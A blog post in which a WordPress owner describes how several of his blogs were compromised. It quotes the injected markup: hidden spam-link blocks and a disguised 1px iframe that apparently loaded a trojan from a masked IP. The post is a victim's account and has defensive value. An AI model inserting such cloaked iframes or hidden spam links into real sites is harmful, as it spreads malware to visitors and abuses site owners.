My Wordpress Hacked with Hidden Spam Injection

Three of my Wordpress blog hacked, that blogs installed on 2 different servers. I was hit by the spam injection. Spammer(s) injected long hidden links (hundreds of lines!) in blog posts and footer of my HYIP blog for revenue sharing site. Spammer(s) are also inserting iframes in blog posts of my other multi register users blog. That spammer(s) hacked this blog too with inject(s) hidden link of common spam words into footer only ( people can’t register at this blog).

Blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation.

Hidden Text Injection : The insertion was done deliberately to hide the text from display as follows (Injected into blog posts from one of my multi users blog):

<font style="overflow: hidden; position: absolute; height: 0pt; width: 0pt">
Spam words with link to spam websites
</font>

Iframe Injection : my other multi register users blog injected with a 1px iframe due to a vulnerability in WordPress … looks like this :

<!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://xx.xxx.xx.xx/iframe/wp-stats.php"> </iframe><!-- End Traffic Statistics -->

and of course it downloads a trojan. Its happening to a TON of blogs too.

Template Injection : Not only did the hackers insert “invisible” code into my blog posts, what had happened was my template had been hacked so that the footer had included a ton of hidden spam terms.
Number of paragraphs: 1
Number of words: 115,520
Number of letters and digits: 468,439
Number of characters: 595,969
File size: 628,009 bytes

Look like this :

<!-- ~ --><u style="display: none"> <a href="http://spammerdomain.ext/spampage.html">ton of spam terms </a> </u><!-- ~ -->

from lower credit card to porn credit card, from buy cheap car insurance to unreal auto car insurance :p

Now, I’m trying to get more information and solve this problem and trying to find the answers for these questions :

Why would someone want to hack my website?
What should I do to detect and eventually block hacking attempts?
What kinds of hackery going on?
How to Prevent SQL Injection Attacks?
How To Repair The Damage?
Search Engine Effects of This Situation
Etc.
I’ll be back soon !

Update :

Google temporarily removed some of my webpages from their search results. Currently pages from blog.pramudita.com are scheduled to be removed for at least 30 days. This blog hacked too. Spam terms inserted into footer.php of current theme and user : “wordpress” registered into that blog, also he changed these files :

  1. index.php
  2. xmlrpc.php
  3. wp-trackback.php and
  4. wp-settings.php

2 Responses to “My Wordpress Hacked with Hidden Spam Injection”


You can subscribe to the RSS feed for comments on this post. You can also reply to this post directly in your weblog, and take advantage of the TrackBack URI to record your reply in this post.

  1. MyAvatars 0.2 Forex trading software. says:
     | 


    It’s a terrible thing to hear that. Did you manage to fix it? How did you fix it??
    What precautions can one take that would be very effective against such hacks?

    http://www.forexfreedownload.com

  2. MyAvatars 0.2 Pramudita Dropped From Google SERP | Pramudita's Network says:
     | 


    [...] Blog). That blog not gets serious attention when my blogs hit by the spam injection. Yes….my blogs hacked with hidden spam injection. I have been tardy to repair that blog. So Google SE detected that : Dear site owner or webmaster [...]

Leave a comment

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Verification Image

Please type the letters you see in the picture.

 - 

Story pulse

graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.graph element.

143 total reads, averaging 11 daily

Money & Investment

  • Is AbuDhabi-Co.com Scam or Real?
    I interested to know more information about new UAE HYIP. This HYIP have a name Abudhabi-Co with domain name abudhabi-co.com. I really know and understand what is HYIP’s world and how to win from HYIP Investment arena. The time is the key, don’t care and never take as problem : downright or lie, scam or [...]

Black Listed & Scam Program

  • TrustyPig
    TrustyPig is an autosurf program owned by Constantin (aka Costy), sure it’s not a real name. You can find TrustyPig here : www.trustypig.com Trusty Pig offers an opportunity to generate instant traffic to your website and earn a total of 130% of your advertising upgrades purchased, the rebates going up to 13% daily and [...]

Blog & WordPress

  • Installing Multiple Blogs for Multiple Users
    I have been planning to install multiple blog for multiple bloggers on my network. Now I confuse which project shall I choose. There are lot of wordpress projects. Alternative projects and plugins which provide some level of multi-blogging facility are : Lyceum Developed by ibiblio.org, Lyceum is a stand-alone multi-user multi-blogging application designed to handle 2 to [...]

Energy and Fuel

  • How to Make Bioethanol
    Last month, I tried to learn how to make bioethanol. Could you make bioethanol? Bioethanol or ethanol is a biofuel that is traditionally produced from the fermentation of starch or sugar crops such as corn, sugar beet and sugar cane. Bioethanol can also be produced from other feedstocks, such as jatropha or switchgrass. It can [...]

My Sister’s Celebrities Gossip

  • Jennifer Hudson On Singing For Barack Obama
    The Oscar winner has been tapped to sing the national anthem Thursday, the night Barack Obama is set to address the increasingly star-studded Democratic National Convention for the first time as his party’s official candidate for president of the United States. The Oscar winner has been drawn to sing the national anthem Thursday, the night [...]

Pramudita’s Network template redesign by Pramudita and uses WordPress.
This Web site may require a highly standards compliant Web browser. Tested on Mozilla, Firefox, Konqueror and Microsoft Internet Explorer 7.
Subscribe to this site's Entries (RSS) or Comments (RSS).

This page is a printout of part of Pramudita’s Network.
URL of this printout: http://www.pramudita.com/my-wordpress-hacked-with-hidden-spam-injection.html